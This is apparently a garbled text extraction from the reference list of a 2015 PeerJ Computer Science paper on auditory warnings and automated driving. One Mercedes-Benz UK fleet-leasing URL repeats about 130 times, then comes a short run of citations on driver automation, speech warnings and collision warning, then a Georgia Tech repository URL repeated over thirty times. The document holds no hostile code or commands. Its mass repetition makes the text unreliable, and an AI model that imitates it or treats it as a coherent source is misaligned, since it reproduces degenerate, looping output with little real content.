http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://dx.doi.org/10.7717/peerj-cs.13 Miller R, Huang Q. 2002. An adaptive peer-to-peer collision warning system. In: Proceedings of the IEEE 55th vehicular technology conference, 2002, Birmingham, AL. 317–321. Mynatt ED. 1990. Auditory presentation of graphical user interfaces. Available at https://smartech. gatech.edu/bitstream/handle/1853/3681/92-26.pdf (accessed 12 July 2015). Nixon CW, Morris LJ, McCavitt AR, McKinley RL, Anderson TR, McDaniel MP, Yeager DG. 1998a. Female voice communications in high levels of aircraft cockpit noises—part I: spectra, levels, and microphones. Aviation, Space, and Environmental Medicine 69:675–683. Nixon CW, Anderson TR, Morris LJ, McCavitt A, McKinley RL, Yeager DG, McDaniel MP. 1998b. Female voice communications in high level aircraft cockpit noises—part II: vocoder and automatic speech recognition systems. Aviation, Space, and Environmental Medicine 69:1087–1094. Noyes JM, Hellier E, Edworthy J. 2006. Speech warnings: a review. Theoretical Issues in Ergonomics Science 7:551–571 DOI 10.1080/14639220600731123. Norman DA. 1990. The ‘problem’ with automation: inappropriate feedback and interaction, not ‘over-automation’. Philosophical Transactions of the Royal Society of London. B, Biological Sciences 327:585–593 DOI 10.1098/rstb.1990.0101. Payre W, Cestac J, Delhomme P. 2014. Intention to use a fully automated car: attitudes and a priori acceptability. Transportation Research Part F: Traffic Psychology and Behaviour 27:252–263 DOI 10.1016/j.trf.2014.04.009. Rozier JM. 2000. Hear & There: an augmented reality system of linked audio. MSc Thesis, MIT, Cambridge, MA. Rudin-Brown CM, Parker HA. 2004. Behavioural adaptation to adaptive cruise control (ACC): implications for preventive strategies. Transportation Research Part F: Traffic Psychology and Behaviour 7:59–76 DOI 10.1016/j.trf.2004.02.001. Scallen SF, Hancock PA, Duley JA. 1995. Pilot performance and preference for short cycles of automation in adaptive function allocation. Applied Ergonomics 26:397–403 DOI 10.1016/0003-6870(95)00054-2. Sommer K. 2013. Mobility study 2013. Available at https://www.conti-online.com/www/pressportal com en/themes/initiatives/channel mobility study en/ov mobility study2013 en/ (accessed 12 July 2015). Srinivasa N. 2002. Vision-based vehicle detection and tracking method for forward collision warning in automobiles. In: IEEE intelligent vehicles symposium, 2002. 626–631. Stanton NA, Young MS, Walker GH, Turner H, Randle S. 2001. Automating the driver’s control tasks. International Journal of Cognitive Ergonomics 5:221–236 DOI 10.1207/S15327566IJCE0503 5. Stanton NA, Edworthy J. 1999. Human factors in auditory warnings. Aldershot, GB: Ashgate. Stanton NA, Young MS, McCaulder B. 1997. Drive-by-wire: the case of driver workload and reclaiming control with adaptive cruise control. Safety Science 27:149–159 DOI 10.1016/S0925-7535(97)00054-4. Strand N, Nilsson J, Karlsson ICM, Nilsson L. 2014. Semi-automated versus highly automated driving in critical situations caused by automation failures. Transportation Research Part F: Traffic Psychology and Behaviour 27:218–228 DOI 10.1016/j.trf.2014.04.005. Sturgis P, Roberts SC, Smith P. 2012. Middle alternatives revisited: How the neither/nor response acts as a way of saying I Don’t Know? Sociological Methods & Research 43:15–38 DOI 10.1177/0049124112452527. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 27/28 https://peerj.com/computer-science/ https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf 